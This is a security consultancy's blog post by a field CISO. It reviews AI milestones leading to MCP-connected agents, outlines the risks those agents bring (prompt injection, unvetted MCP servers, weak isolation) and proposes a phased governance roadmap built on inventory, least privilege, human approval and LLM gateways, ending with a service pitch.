With AI capabilities evolving at breakneck speed, I wanted to reflect on where we stand today and share my roadmap as a field CISO (vCISO) for integrating security into the heart of innovation.

1. How We Got Here: Key AI Milestones Shaping Today’s Security Risk

A bit of history: the evolution of AI has accelerated from simple text prediction to autonomous agency in less than a decade. It “began” in 2017 with Google’s landmark paper, “Attention Is All You Need,” which introduced the Transformer architecture and the “Attention” mechanism. This allows models to process vast amounts of data in parallel. That foundation led directly to the 2022 release of ChatGPT, often seen as the “iPhone moment” for AI through LLMs (Large Language Models), bringing sophisticated conversational capability into the public mainstream.

Even then, security teams were already considering emerging risks, such as prompt injection, and grappling with confidentiality concerns.

By 2023 and 2024, the technology became multimodal, giving models the native ability to “see” images and “hear” audio as fluently as they read text. That shift expanded both the landscape of AI usage and the potential impact of AI failure.

Then in 2025, we entered what I’d call the era of the agent, led by the Model Context Protocol (MCP) and Agentic Communication Protocols (ACP). These standards act as a universal “plug,” allowing AI to move beyond conversation and into action by accessing your data, connecting with other software, and autonomously completing complex tasks on your behalf.

The LLM boom has transformed productivity and natural language interaction. It has created genuine opportunity by accelerating processes and reducing friction, but it has also created new risks we must address.

To summarize the major milestones:

·      2017 (Concept of “Attention”): Google publishes *“Attention Is All You Need.”

·      2022: First public release of an LLM via ChatGPT.

·      November 2024 (MCP launch): Anthropic releases MCP, enabling universal connections to data sources (e.g., PostgreSQL, GitHub, Slack), marking the beginning of the end for proprietary integrations and reducing vendor lock-in.

·      Throughout 2025 (ACP stabilization): IBM Research releases ACP in March 2025. The protocol gains traction and defines rules for dialogue between autonomous agents, supporting traceability of inter-AI decision-making.

·      2026 (Native interoperability): MCP becomes natively integrated into most enterprise productivity tools, turning the AI agent into a standard collaborator within the corporate IT ecosystem.

 2. The Road to (Autonomous) Agents

MCP has quickly moved from “interesting idea” to practical foundation for agentic workflows. This is already happening in the real world, with tools that are reshaping how people build, troubleshoot, and operate day-to-day.

·      Claude-code, Gemini-cli or Open-code: We’re seeing a wave of terminal-native agentic interfaces that leverage MCP to bridge the gap between static code and live environments. By connecting to MCP servers, these tools can transform a standard shell into a reasoning engine capable of querying databases, searching documentation, and executing builds with stronger environmental awareness.

Some of these tools include built-in capabilities (ex. file explorer) that are not technically MCP servers today. However, these functions can be replaced by MCP servers over time, and that transition is likely to accelerate as standardization increases.

·      Zed, Cursor or Windsurf: AI-native IDEs like Cursor and Windsurf represent the first wave of native MCP integration (2025). They go beyond autocomplete by enabling AI to interact directly with infrastructure through Docker, Kubernetes, or Jira MCP servers. This supports faster diagnosis and remediation in real time, directly inside the coding context.

·      OpenClaw (formerly Moltbot, then Clawbot): High-autonomy orchestrators inspired by Claude Cowork are designed to run as background daemons. OpenClaw shifts the paradigm from reactive, user-triggered AI to proactive, event-triggered AI. By monitoring security tickets or system logs, these agents can autonomously gather context via MCP and prepare draft remediations before a human operator even opens the ticket.

The concept isn’t new, but standardization makes it far easier to implement. That ease has created a viral buzz. For some, it feels like magic. For others, it triggers fear, often framed through a “Terminator-like AI” lens.

A notable adjacent experiment is Clawbook, a side project from the author of OpenClaw. It’s positioned as a social orchestration lab, originally designed as an AI-only “Reddit” for agent-to-agent discourse and as a testing ground for multi-agent negotiation. While recent API leaks suggest a hybrid human-AI presence, the core value remains the study of how autonomous agents share MCP-derived context to solve complex, multi-step problems.

3. Risks of MCP-Connected AI Agents

If the LLM is the brain, MCPs are the hands. In 2026, giving LLMs access to your production systems and tools without control is like leaving your data center doors wide open in the name of “workflow fluidity.”

Using tools augmented by MCP requires new rigor from the CISO, even though the underlying risks are familiar. In practice, the main risks cluster into three areas.

Local context exposure.

Unlike a web chatbot, an agent such as Claude Code or Gemini-cli runs with the user’s local privileges. A malicious prompt injection could trigger unauthorized command execution on the host machine.

Skill supply chain risk.

We need to audit the ecosystem of community MCP servers with the same rigor we apply to any new system component, such as a new microservice. Validating these connectors is essential to prevent API key exposure and the misuse of critical functions, while maintaining clear oversight of resource access. This applies equally to the built-in functions of your agents.

Strategic isolation gaps.

For sensitive projects, dedicated containers and isolated virtual machines should be the standard. This limits the potential impact of agents operating with elevated access.

4. A CISO Roadmap to Secure Agentic AI and MCP Adoption

Innovation and transformation must remain the primary drivers of organizational success. The objective is to facilitate AI adoption, responsibly by implementing governance frameworks that align with the current landscape of MCP-enabled tools and agentic workflows.

To do that well, I recommend a phased approach that builds visibility first, then applies strong access controls, and finally scales governance as adoption grows.

Phase 1 (Immediate and short term): Establish inventory and visibility.

Start by building a clear picture of what is in use today and what is being introduced. That includes the LLMs your teams are using, the AI clients in play and their built-in functions, and the data sources or tools you intend to expose through secure MCP servers.

Phase 2 (Mid term): Apply Zero Trust principles to MCP access.

Treat each AI client application and MCP server as a privileged integration point. Assign only the permissions required for the specific workflows and enforce the Principle of Least Privilege. Access should be explicit, scoped, and continuously reviewed.

Phase 3 (Ongoing): Keep a human in the loop for high-risk actions.

Supervision is the most reliable safeguard against the risks of increased autonomy and AI model inaccuracies (also called “hallucinations”). Human-in-the-loop approvals for critical operations are non-negotiable, provided they are structured to be both risk-appropriate and operationally realistic (synthesized into a feasible workflow). Maintaining this balance is a key leadership priority for organizations exploring advanced agentic workflows.

Phase 4 (Standardize as you scale): Introduce control layers for consistency and governance.

Even if the category is still maturing, LLM gateways (with implementations like ‘LiteLLM' or ‘Bifrost’) have emerged as a great abstraction layer for modern AI stacks. By decoupling the consumption layer from the provider API, these proxies serve as a centralized enforcement point for rate-limiting, cost attribution, and schema validation. Furthermore, they act as a vital intermediary for MCP server interactions, facilitating standardized state management and secure tool-calling across heterogeneous model environments. Much like traditional web proxies, these platforms centralize policy enforcement, auditing, and logging. However, leadership must carefully evaluate the trade-offs; such centralization can introduce in some cases operational bottlenecks, or single points of failure. Implementation must be supported by robust functional testing, and complemented by appropriate redundancy measures and business continuity planning.

5. Final Thoughts: Building Trusted AI With MCP, ACP, and Governance

Standardization through MCP and ACP, paired with a clear inventory of LLMs and AI clients, forms the foundation of Trusted AI. Adopting these frameworks does not hinder innovation. It helps CISOs design it in a way that scales, with security built in from the start.

Want to accelerate AI adoption without widening your risk surface?

Kudelski Security can help you assess your current AI and agentic exposure, design practical guardrails around MCP/ACP-enabled workflows, and build a Trusted AI foundation that scales.

Get in touch with our team to start the conversation.

‍

‍

‍

‍

‍